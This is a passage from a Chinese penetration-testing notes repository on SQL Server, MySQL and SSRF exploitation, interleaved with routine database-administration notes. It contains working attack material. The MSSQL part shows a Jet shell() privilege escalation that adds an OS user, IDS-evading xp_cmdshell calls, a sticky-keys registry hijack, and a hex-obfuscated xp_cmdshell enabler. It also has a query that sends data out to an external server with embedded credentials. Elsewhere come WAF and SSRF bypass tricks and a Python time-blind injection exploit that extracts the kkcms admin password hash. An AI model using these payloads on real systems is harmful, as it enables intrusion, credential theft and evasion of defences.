'Microsoft.Jet.OLEDB.4.0' 执行查询。 205 | [OLE/DB provider returned message: 未知] 206 | OLE DB 错误跟踪[OLE/DB Provider 'Microsoft.Jet.OLEDB.4.0' ICommandText::Execute returned 0x80040e14]。 207 | 208 | 5、如果net权限不对时,却没有任何提示。 209 | 最终的提权办法就是在当前的web目录下面上传系统的ias.mdb和cmd.exe,net.exe三个文件。 210 | 执行select * from openrowset('microsoft.jet.oledb.4.0',';database=E:\web\ias.mdb','select shell("E:\web\cmd.exe /c E:\web\net.exe user user passwd /add")') 211 | 成功增加一个计算机用户。 212 | 213 | 214 | 215 | 拆分cmdshell绕过IDS 216 | declare @a sysname set @a='xp_'+'cmdshell' exec @a 'ipconfig' 217 | declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\' 218 | 219 | 220 | 编辑注册表劫持shift 221 | exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';-- 222 | 223 | 查询linkserver 224 | select srvid,srvstatus,srvname,srvproduct,providername,datasource,location,schemadate,catalog,srvnetname,isremote,rpc,dataaccess from master.dbo.sysservers 225 | select srvid,srvstatus,srvname,srvproduct,providername,datasource,location,schemadate,catalog,srvnetname,isremote,rpc,dataaccess from master.dbo.sysservers 226 | 227 | 查询linkserver2 228 | select distinct hostname,db_name(dbid),net_address,loginame,program_name from master..sysprocesses 229 | 230 | 查询linkserver等登录用户 231 | select * from [192.168.1.1].master.dbo.syslogins 232 | 233 | 查询linkserver上的所有数据库 234 | select * from linkedSrvWeb.master.dbo.sysdatabases 235 | 236 | 在linkserver上执行扩展存储 237 | exec [ip].master.dbo.xp_cmdshell 238 | 239 | 在linkserver上查询所有的表 240 | select * from [ip].master.dbo.sysobjects 241 | 242 | 243 | 244 | 245 | select * from openrowset('sqloledb','server=IP;uid=用户;pwd=密码','select @@version') 246 | 247 | select * from openquery([LINKSERVER名称],'select @@version') 248 | 249 | 250 | select * from openquery(NDOORS,'select IS_SRVROLEMEMBER(''sysadmin'')') 251 | 252 | 253 | select * from openquery(GM_SERVER,'select * from sysobjects where xtype = (''U'')') 254 | 255 | select * from openquery(NDOORS,'Select IS_MEMBER(''db_owner'')') 256 | 257 | 258 | select * from openquery(toatdeweb,'select srvname from master.dbo.sysservers') 259 | 260 | insert into opendatasource('sqloledb','server=222.241.95.12;uid=scd;pwd=a123520;database=hack520').hack520.dbo.zhu select name from master.dbo.sysdatabases 261 | create database hack520 Create TABLE zhu(name nvarchar(256) null);Create TABLE J8(id int NULL,name nvarchar(256) null); 262 | 263 | select * from openquery(toatdeweb,'set fmtonly off exec master.dbo.xp_cmdshell ''net user''') 264 | 265 | exec master..xp_dirtree 'c:\',1,1 执行查询目录 266 | 267 | exec links.master..xp_cmdshell 'ipconfig' 268 | 269 | select * from openquery(toatdeweb,'set fmtonly off exec master.dbo.xp_cmdshell ''ipconfig /all''') 270 | 271 | 连接mysql Select * from Mem_DB.UserDB.dbo.AdminList 272 | 273 | EXEC MASTER..XP_dirtree 'c:\',1,1 274 | 275 | 276 | Exec master.dbo.xp_cmdshell 'dir ' 277 | 278 | select count(*) from [表明] 查询当前表有多少数据 279 | 280 | 281 | select distinct hostname,db_name(dbid),net_address,loginame,program_name from master..sysprocesses 282 | 283 | 284 | 285 | select * from gamedb01.Server01.dbo.cabal_character_table where name='猪' 286 | 287 | 288 | 你删除的时候显示:数据库正在被使用,无法删除。 289 | 290 | 点击要删除的数据库,打开事件查看器。 291 | 292 | 输入: 293 | 294 | use master 295 | go 296 | 然后输入以下内容: 297 | declare @d varchar(8000) 298 | set @d= ' ' 299 | select @d=@d+ ' kill '+cast(spid as varchar)+char(13) 300 | from master..sysprocesses where dbid=db_id( '库名 ') 301 | exec(@d) 302 | --用代码先删除连接此数据库的进程 303 | 304 | 305 | 306 | 307 | 308 | 309 | mssql通过linkserver操作oracle 310 | 311 | 312 | 313 | 1)在SQL_SERVER 2005服务器上安装Oracle 9i的客户端。假设安装到C:\ora92i\ 目录。如果D:是NTFS分区,需要将ORACLE安装后的目录设为所使用的用户有权可运行、可添加、可删除。 314 | 315 | 2)配置C:\ora92i\network\ADMIN\tnsnames.ora 文件。(以下红色文字是一个配置范例) 316 | 317 | ORCL= 318 | 319 | (DESCRIPTION = 320 | 321 | (ADDRESS_LIST = 322 | 323 | (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.0.11)(PORT= 1521)) 324 | 325 | ) 326 | 327 | (CONNECT_DATA = 328 | 329 | (SERVICE_NAME = orcl) 330 | 331 | ) 332 | 333 | ) 334 | 335 | 3)在DOS模式下运行以下命令以便确认ORACLE客户端安装无误。 336 | 337 | sqlplus user/password@ORCL 338 | 339 | 4)打开开始-控制面板-服务,确认Distributed Transaction Coordinator服务已启动。 340 | 341 | 5)打开SQL SERVER Management Studio,实例名称(ORCL)-服务器对象(右键)-新建连接服务器。 342 | 343 | 1. 链接服务器:写上链接服务器的名字,如:OracleTest 344 | 345 | 2. 服务器类型,选择其他数据源 346 | 347 | 3. 访问接口:选择Oracle Provider for OLE DB 348 | 349 | 4. 产品名称:写上Oracle 350 | 351 | 5. 数据源:写上tnsnames.ora文件中配置的服务名,如:ORCL 352 | 353 | 6. 访问接口字符串:userid=sys as sysdba;password=password 354 | 355 | 7. 在选择安全性选项页,使用此安装上下文建立连接: 356 | 357 | a) 远程登录:user(其他用户,非sys) 358 | 359 | b) 使用密码:password 360 | 361 | 8. 本地登录上设置“NT AUTHORITY\SYSTEM”,远程用户sys,设置密码 362 | 363 | 9. 确定 364 | 365 | 6)SQL的写法有两种 366 | 367 | a) 使用T-SQL语法: 368 | 369 | SELECT * FROM OraTest.ERP.BAS_ITEM_CLASS 370 | 371 | 注意在,SQL查询分析器中输入SQL语句时注意中文的全角半角切换方式! 372 | 373 | b) 使用PLSQL语法: 374 | SELECT * FROM openquery(OraTest,'SELECT * FROM OraTest.ERP.BAS_ITEM_CLASS ') 375 | 376 | c)第二种访问方式比第一种约快50%;第二种访问方式跟直连ORACLE的速度相当;第一种访问方式可能会导致一些意外错误,如: 377 | 该表不存在,或者当前用户没有访问该表的权限等等一些信息。 378 | 379 | d)如果需要访问的column中使用没有精度的数据类型,这两种查询方式都可能会报错,这是ORACLE的BUG,无法修正,只能通过查询语句的特殊处理规避这一问题: 380 | OLE DB 提供程序 'OraOLEDB.Oracle' 为列提供的元数据不一致。执行时更改了元数据信息。 381 | 382 | 383 | 384 | 385 | 386 | mssql添加删除用户,并赋予权限 387 | 388 | use 你的库名 389 | go 390 | --新增用户 391 | exec sp_addlogin 'test' --添加登录 392 | exec sp_grantdbaccess N'test' --使其成为当前数据库的合法用户 393 | exec sp_addrolemember N'db_owner', N'test' --授予对自己数据库的所有权限 394 | --这样创建的用户就只能访问自己的数据库,及数据库中包含了guest用户的公共表 395 | go 396 | --删除测试用户 397 | exec sp_revokedbaccess N'test' --移除对数据库的访问权限 398 | exec sp_droplogin N'test' --删除登录 399 | 如果在企业管理器中创建的话,就用: 400 | 企业管理器--安全性--右键登录--新建登录 401 | 常规项 402 | --名称中输入用户名 403 | --身份验证方式根据你的需要选择(如果是使用windows身份验证,则要先在操作系统的用户中新建用户) 404 | --默认设置中,选择你新建的用户要访问的数据库名 405 | 服务器角色项 406 | 这个里面不要选择任何东西 407 | 数据库访问项 408 | 勾选你创建的用户需要访问的数据库名 409 | 数据库角色中允许,勾选"public","db_ownew" 410 | 确定,这样建好的用户与上面语句建立的用户一样 411 | --------------------------------------------------------------------------- 412 | 最后一步,为具体的用户设置具体的访问权限,这个可以参考下面的最简示例: 413 | --添加只允许访问指定表的用户: 414 | exec sp_addlogin '用户名','密码','默认数据库名' 415 | --添加到数据库 416 | exec sp_grantdbaccess '用户名' 417 | --分配整表权限 418 | GRANT SELECT , INSERT , UPDATE , DELETE ON table1 TO [用户名] 419 | --分配权限到具体的列 420 | GRANT SELECT , UPDATE ON table1(id,AA) TO [用户名] 421 | ------------------------------------------------------------------- 422 | 至于具体的安全设置和理论知道,参考SQL联机帮助 423 | 424 | 425 | 426 | 固定数据库角色 描述 427 | db_owner 在数据库中有全部权限。 428 | db_accessadmin 可以添加或删除用户 ID。 429 | db_securityadmin 可以管理全部权限、对象所有权、角色和角色成员资格。 430 | db_ddladmin 可以发出 ALL DDL,但不能发出 GRANT、REVOKE 或 DENY 语句。 431 | db_backupoperator 可以发出 DBCC、CHECKPOINT 和 BACKUP 语句。 432 | db_datareader 可以选择数据库内任何用户表中的所有数据。 433 | db_datawriter 可以更改数据库内任何用户表中的所有数据。 434 | db_denydatareader 不能选择数据库内任何用户表中的任何数据。 435 | db_denydatawriter 不能更改数据库内任何用户表中的任何数据。 436 | 437 | 438 | 你应该选择db_datareader,db_datawriter,db_accessadmin 439 | 440 | 441 | 5. 在SQL Server实例以单用户模式启动后,Windows管理员帐号就能使用sqlcmd工具在Windows验证模式下连接SQL Server。您可以使用T-SQL命令诸如“sp_addsrvrolemember”来在sysadmin服务器角色中添加现有登录帐号或新创建一个登录帐号。范例语句如下: 442 | 443 | EXEC sp_addsrvrolemember 'CONTOSO\Buck', 'sysadmin'; 444 | 445 | GO 446 | 447 | 增加一个sysadmin权限的用户 448 | 449 | 450 | 451 | 452 | (1)管理服务器角色 453 | 454 | 在SQL Server中,实现SQL Server角色管理的存储过程主要有两个: 455 | 456 | sp_addsrvrolemember和sp_dropsrvrolemember 457 | 458 | sp_addsrvrolemember可以将某一登录帐号加入到服务器角色中,使其成为该服务器角色的成员。语法如下: 459 | sp_addsrvrolemember login , role 460 | 461 | sp_dropsrvrolemember可以将某一登录帐号从某一服务器角色中删除,当该成员从服务器角色中被删除后,便不再具有该服务器角色所设置的权限。语法如下: 462 | sp_dropsrvrolemember [@loginname=]'login',[@rolename=]'role' 463 | 464 | 其中@loginname为登录者名称;@rolename为服务器角色。 465 | 466 | 467 | (2)管理数据库角色 468 | 469 | 在SQL Server中,支持数据库管理的存储过程主要有六种,其具体含义和语法如下: 470 | 471 | sp_addrole:用于创建一个新的数据库角色; 472 | sp_addrole role, owner 473 | 474 | sp_droprole:用于从当前数据库角色中删除一个数据库角色; 475 | sp_droprole role 476 | 477 | sp_helprole:用于显示当前数据库中所有数据库角色的全部信息; 478 | sp_helprole ['role'] 479 | 480 | sp_addrolemember:用于向数据库某一角色中添加数据库用户,这些角色可以是用户自定义的标准角色,也可以是固定的数据库角色,但不能是应用程序角色。 481 | sp_addrolemember role, security_account 482 | 483 | sp_droprolemember:用于删除某一角色的用户; 484 | sp_droprolemember role, security_account 485 | 486 | sp_helprolemember:用于显示某一数据库角色的所有成员。 487 | sp_helprolemember ['role'] -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/SQLServer注入WAF绕过.md: -------------------------------------------------------------------------------- 1 | 执行命令的3种方式 2 | ``` 3 | xp_cmdshell 4 | sp_oacreate 5 | clr 6 | ``` 7 | 8 | ``` 9 | execute('declare @s varchar(2000) set @s=0x657865632073705f636f6e666967757265202773686f7720616476616e636564206f7074696f6e73272c20313b7265636f6e6669677572653b657865632073705f636f6e666967757265202778705f636d647368656c6c272c20313b7265636f6e6669677572653b657865632078705f636d647368656c6c202763616c6327 exec(@s)') -- DBeM 10 | 11 | execute('declare @s varchar(2000) set @s=0x657865632073705f636f6e666967757265202773686f7720616476616e636564206f7074696f6e73272c20313b7265636f6e6669677572653b657865632073705f636f6e666967757265202778705f636d647368656c6c272c20313b7265636f6e6669677572653b657865632078705f636d647368656c6c202763616c6327 exec(@s)') -- DBeM 12 | ``` -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/mssql waf绕过检测利用/pic/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mssql waf绕过检测利用/pic/0.png -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/mssql waf绕过检测利用/pic/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mssql waf绕过检测利用/pic/1.png -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/mssql waf绕过检测利用/pic/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mssql waf绕过检测利用/pic/2.png -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/mssql waf绕过检测利用/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/mssql waf绕过检测利用/readme.md: -------------------------------------------------------------------------------- 1 | # 0、基于大小写的WAF绕过 2 | 对每个字符进行大小写尝试 3 | 4 | # 1、基于拦截空格的WAF绕过 5 | 常见有5个位置即:select * from admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()【位置四】from【位置五】admin 6 | 7 | 经测试发现,MSSQL中关键字能和前边的值没有空格(能和前边的值挨着),但不能和后边的值没有空格(不能和后边的值挨着) 8 | 9 | ## 1.1 基于拦截空格的WAF绕过——使用注释符代替空格 10 | ``` 11 | select session_id,command from sys.dm_exec_requests where session_id=12/**/and/**/1=@@VERSION; 12 | ``` 13 | 如下图 14 | ![image](./pic/0.png) 15 | ## 1.2 基于拦截空格的WAF绕过——使用%00-%1F代替空格 16 | %20本身是空格的URL编码,故它不能绕过WAF 17 | 18 | ## 网上误导纠正 19 | 1、有人提到浮点数能充当空格,经过测试,浮点数充当空格是不报错,但并不能正确显示结果,如下图 20 | ![image](./pic/1.png) 21 | 22 | 参考链接: 23 | https://www.cnblogs.com/xiaozi/p/6930013.html 24 | 25 | # 2、基于拦截关键字的WAF绕过 26 | ## 网上误导纠正 27 | MSSQL下并不能使用&&代替and、||代替or,mssql 2008 r2下测试如下: 28 | ![image](./pic/2.png) 29 | -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/mssql基本检测利用/pic/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mssql基本检测利用/pic/0.png -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/mssql基本检测利用/pic/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mssql基本检测利用/pic/1.png -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/mssql基本检测利用/pic/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mssql基本检测利用/pic/2.png -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/mssql基本检测利用/pic/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mssql基本检测利用/pic/3.png -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/mssql基本检测利用/pic/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mssql基本检测利用/pic/4.png -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/mssql基本检测利用/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/mssql基本检测利用/readme.md: -------------------------------------------------------------------------------- 1 | ### 0、堆叠查询+时间盲注 检测漏洞是否存在 2 | ``` 3 | select session_id from sys.dm_exec_requests where session_id=12; waitfor delay '0:0:5'-- 4 | ``` 5 | ![image](./pic/0.png) 6 | 7 | ### 1、报错注入 查询数据库版本 8 | ``` 9 | select session_id,command from sys.dm_exec_requests where session_id=12 or 1=@@VERSION; 10 | ``` 11 | ![image](./pic/1.png) 12 | 13 | ### 2、堆叠查询+时间盲注 查询当前用户是否为dba 14 | ``` 15 | select session_id,command from sys.dm_exec_requests where session_id=12;if(1=(select is_srvrolemember('sysadmin'))) waitfor delay '0:0:5'-- 16 | ``` 17 | ![image](./pic/2.png) 18 | 19 | ### 3、堆叠查询+时间盲注 查询是否站库分离 20 | ``` 21 | select session_id from sys.dm_exec_requests where session_id=12;if(host_name()=@@servername)waitfor delay '0:0:5';-- 22 | 23 | --host_name():连接数据库管理系统的工作站所在机器的计算机名 24 | --@@servername:数据库管理系统所在机器的计算机名 25 | --参考链接: 26 | --https://docs.microsoft.com/en-us/sql/t-sql/functions/host-name-transact-sql?view=sql-server-ver15 27 | --https://docs.microsoft.com/en-us/sql/t-sql/functions/servername-transact-sql?view=sql-server-ver15 28 | ``` 29 | ![image](./pic/3.png) 30 | 31 | ### 4、堆叠查询+时间盲注 查询是否开启xp_cmdshell 32 | ``` 33 | select session_id from sys.dm_exec_requests where session_id=12;if(1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')) WAITFOR DELAY '0:0:5'-- 34 | 35 | --开启xp_cmdshell: 36 | --EXEC sp_configure 'show advanced options',1; 37 | --RECONFIGURE; 38 | --EXEC sp_configure 'xp_cmdshell',1; 39 | --RECONFIGURE; 40 | 41 | --关闭xp_cmdshell: 42 | --EXEC sp_configure 'show advanced options',1; 43 | --RECONFIGURE; 44 | --EXEC sp_configure 'xp_cmdshell',0; 45 | --RECONFIGURE; 46 | 47 | --添加xp_cmdshell: 48 | --exec sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll' 49 | 50 | --删除xp_cmdshell: 51 | --exec sp_dropextendedproc 'xplog70.dll' 52 | ``` 53 | ![image](./pic/4.png) 54 | -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/mysql-time-blind-kkcms-exp/mysql-time-blind-kkcms-exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | import requests 4 | import sys 5 | import time 6 | 7 | def do_request(url, guess_char, payload_var): 8 | payload = "abc'and if((ascii(substring((select m_password from xtcms_manager limit 1)," + str(guess_char) + ",1))=" + str(payload_var) + "),sleep(5),1)#"; 9 | r = requests.post(url, data={"name":payload, "email":"", "submit":""}, timeout=35); 10 | return r.elapsed.total_seconds(); 11 | 12 | def main(): 13 | if len(sys.argv) != 2: 14 | print("Usage: below example is from ubuntu"); 15 | print("Usage: python3 time-blind-php-mysql-kkcms-exp.py http://www.example.com"); 16 | exit(); 17 | else: 18 | url = sys.argv[1]; 19 | 20 | #定义爆破字符集,md5加密后的字符串只包括小写字母和数字,故只定义小写字母和数字 21 | char_set = []; 22 | for i in range(97, 123): 23 | char_set.append(i); 24 | for j in range(48, 58): 25 | char_set.append(j); 26 | #print(char_set); 27 | 28 | start_time = time.asctime( time.localtime( time.time() ) ); 29 | print("Starting time is: " + start_time); 30 | 31 | success_string = "e10adc3949ba59abbe56e057f20f88"; 32 | count = 31; 33 | for m in range(31, 33): 34 | for k in char_set: 35 | print(" Guessing the char " + chr(k) + " ..."); 36 | elapsed = do_request(url, m, k); 37 | if elapsed > 20.0: 38 | continue; 39 | else: 40 | print( " Bruted the char" + str(count) + ": " + chr(k) ); 41 | success_string += ( chr(k) ); 42 | break; 43 | count += 1; 44 | print("The final string is: " + success_string); 45 | 46 | end_time = time.asctime( time.localtime( time.time() ) ); 47 | print("Ending time is: " + end_time); 48 | 49 | main(); 50 | -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/mysql-time-blind-kkcms-exp/readme.md: -------------------------------------------------------------------------------- 1 | 此exp是我之前挖CNVD时,用于验证漏洞写的exp 2 | -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/mysql注入waf绕过/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mysql注入waf绕过/0.png -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/mysql注入waf绕过/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mysql注入waf绕过/1.png -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/mysql注入waf绕过/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/mysql注入waf绕过/2.png -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/mysql注入waf绕过/readme.md: -------------------------------------------------------------------------------- 1 | 1、內联注释 2 | 这里要注意:内联注释之中不支持再使用内联注释 3 | ``` 4 | /*!*/ 5 | 解释:mysql为了兼容其他数据库,将mysql中特有的东西放入其中,如/*!STRAIGHT_JOIN*/,这样在其他数据库中会将其视为注释,但在mysql中会解释执行 6 | ``` 7 | ``` 8 | /*!50110STRAIGHT_JOIN*/ 9 | 解释:表示此语句仅在mysql版本大于等于5.1.10时才执行 10 | ``` 11 | 参考链接: 12 | https://blog.csdn.net/herojuice/article/details/85136922 13 | https://www.cnblogs.com/itcomputer/articles/5253263.html 14 | https://dev.mysql.com/doc/refman/5.7/en/comments.html 15 | 参考实例: 16 | https://mp.weixin.qq.com/s/84se5CxYlVT05bcw654wKg 这篇文章用到了上述的技巧绕过了Mod_Security 17 | 18 | 2、寻找替代 19 | 2.1、可用&&代替and,如下图 20 | ![image](./0.png) 21 | 2.2、可用true代替and 1=1以及用false代替and 1=2,如下图 22 | ![image](./1.png) 23 | 24 | 3、通过注释分割关键字 25 | ``` 26 | 可用database/**/()代替database() 27 | ``` 28 | 如下图 29 | ![image](./2.png) 30 | -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/sql注入中的dios/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/sql注入中的dios/0.png -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/sql注入中的dios/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/sql注入中的dios/1.png -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/sql注入中的dios/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/sql注入中的dios/2.png -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/sql注入中的dios/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/SQL注入/sql注入中的dios/3.png -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/sql注入中的dios/readme.md: -------------------------------------------------------------------------------- 1 | 在https://mp.weixin.qq.com/s/84se5CxYlVT05bcw654wKg 这篇文章中首次看到的DIOS,感觉好像很厉害的样子,遂去网上开始找资料 2 | 3 | 先说结论(个人理解):不是什么新的SQL注入漏洞利用方式,只是一种“在一条语句中提取全部数据的方便的”提取方式 4 | 5 | # 获取所有数据库名: 6 | ``` 7 | (select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata) where (@a) in (@a:=concat(@a,schema_name,'
'))))a); 8 | ``` 9 | ![image](./0.png) 10 | 解释: 11 | 首先需要知道3个事: 12 | 1、@a是sql中的变量,涉及到它的表达式需要用括号扩上 13 | 2、:=是sql中的赋值符号 14 | 3、sql中的函数concat有一个特性,如果参数中有一个为NULL,那么结果为NULL,所以需要先执行select(@a:=0x00) 15 | 从最内层开始解释: 16 | ``` 17 | (@a:=concat(@a,schema_name,'
')) 18 | ``` 19 | 连接这3个参数的值 20 | 倒数第二层的解释,此时语句变成了: 21 | ``` 22 | (select (@a) from ( information_schema.schemata) where (@a) in (@a:=concat(@a,schema_name,'
')) ) 23 | ``` 24 | 通常的where in用法形如:select x from y where x in (1,2,3)从表y中选择字段x,然后x的值范围是(1,2,3) 25 | 但是此条语句并不是通常的where in用法,而是将information_schema.schemata中schema_name的值依次添加到变量@a中 26 | 倒数第三层的解释,此时语句变成了: 27 | ``` 28 | (select (@a) from (select(@a:=0x00),expr1)a); 29 | ``` 30 | 再进一步简化一下: 31 | ``` 32 | (select (@a) from (expr2)a); 33 | ``` 34 | 此条语句即表示:选择@a的值 35 | 此时查看@a的值如下 36 | ![image](./1.png) 37 | 此时 38 | ``` 39 | (select(@a:=0x00),(select (@a) from (information_schema.schemata) where (@a) in (@a:=concat(@a,schema_name,'
')))); 40 | ``` 41 | 的值如下 42 | ![image](./2.png) 43 | 44 | # 获取指定数据库的全部表名和字段名 45 | ``` 46 | (select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(table_schema='anyisec')and(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a); 47 | ``` 48 | ![image](./3.png) 49 | 50 | 参考链接: 51 | http://blog.dreamfever.me/2016/04/20/dump-in-one-shot/ 52 | http://securityidiots.com/Web-Pentest/SQL-Injection/Dump-in-One-Shot-part-1.html 53 | http://securityidiots.com/Web-Pentest/SQL-Injection/Dump-in-One-Shot-part-2.html 54 | http://securityidiots.com/Web-Pentest/SQL-Injection/DIOS-the-SQL-Injectors-Weapon-Upgraded.html 55 | -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/单引号过滤绕过方式/readme.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 使用16进制代替字符串 3 | ``` 4 | 参考链接: 5 | https://xz.aliyun.com/t/9367 6 | -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/各种语言注释总结/readme.md: -------------------------------------------------------------------------------- 1 | # Visual Basic注释(2种): 2 | ``` 3 | ' 4 | rem 5 | ``` 6 | 参考链接: 7 | https://docs.microsoft.com/zh-cn/dotnet/visual-basic/programming-guide/program-structure/comments-in-code 8 | # Visual Basic Script注释(1种): 9 | ``` 10 | ' 11 | ``` 12 | 参考链接: 13 | https://www.cnblogs.com/liuzhengliang/archive/2006/11/22/568629.html 14 | 15 | # PHP注释(3种): 16 | ``` 17 | # 18 | // 19 | /**/ 20 | ``` 21 | 参考链接: 22 | https://www.php.net/manual/zh/language.basic-syntax.comments.php 23 | 24 | # MySQL注释(3种): 25 | ``` 26 | # 27 | --+ 28 | /**/ 29 | ``` 30 | 参考链接: 31 | https://dev.mysql.com/doc/refman/5.7/en/comments.html 32 | 33 | # SQL Server注释(2种): 34 | ``` 35 | -- 36 | /**/ 37 | ``` 38 | 参考链接: 39 | https://docs.microsoft.com/en-us/sql/t-sql/language-elements/comment-transact-sql?view=sql-server-2016 40 | https://blog.sqlauthority.com/2007/08/03/sql-server-two-different-ways-to-comment-code-explanation-and-example/ 41 | 42 | 43 | # Access注释: 44 | ``` 45 | Access中没有注释符 46 | ``` 47 | 参考链接: 48 | https://www.teagle.top/index.php/archives/147/ 49 | https://bbs.csdn.net/topics/80515067 50 | -------------------------------------------------------------------------------- /04-漏洞利用/SQL注入/宽字节注入特性/readme.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 目标使用addslashes进行防护时,如果数据库使用的字符集不是UTF-8,需考虑是否存在宽字节注入,宽字节注入不仅限于GBK,还可以是GB2312等 3 | ``` 4 | -------------------------------------------------------------------------------- /04-漏洞利用/SSRF漏洞WAF绕过.md: -------------------------------------------------------------------------------- 1 | https://portswigger.net/web-security/ssrf 2 | 3 | SSRF漏洞原理:诱导服务端应用程序发起http请求到任何攻击者指定的地址 4 | 5 | SSRF漏洞危害1:绕过本地服务端验证 6 | 对应利用方式:直接访问http://localhost/admin/ 7 | 基于场景1:访问控制是独立于应用服务器,且位于应用服务器前端的一个模块 8 | 基于场景2:基于故障恢复考虑,从回环网卡发起的请求不需要验证 9 | 基于场景3: 10 | (没明白)The administrative interface might be listening on a different port number than the main application, and so might not be reachable directly by users. 11 | 12 | SSRF漏洞危害2:绕过后端服务端验证 13 | 对应利用方式:先扫描C段开放80、8080的ip,再访问http://ip:port/admin/ 14 | 15 | 16 | SSRF防护1:基于黑名单的过滤器 17 | 绕过思路1:尝试大小写和URL编码(有疑问,URL解码是在过滤器之前进行的吗?) 18 | 绕过思路2:尝试127.0.0.1的替代形式,如127.1、2130706433、017700000001、169.xxx.xxx.xxx 19 | 绕过思路3:注册自己的域名,指向127.0.0.1 -------------------------------------------------------------------------------- /04-漏洞利用/ThinkPHP文件写入WAF绕过/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/ThinkPHP文件写入WAF绕过/01.png -------------------------------------------------------------------------------- /04-漏洞利用/ThinkPHP文件写入WAF绕过/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/ThinkPHP文件写入WAF绕过/02.png -------------------------------------------------------------------------------- /04-漏洞利用/ThinkPHP文件写入WAF绕过/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/ThinkPHP文件写入WAF绕过/03.png -------------------------------------------------------------------------------- /04-漏洞利用/ThinkPHP文件写入WAF绕过/04.png: -------------------------------------------------------------------------------- 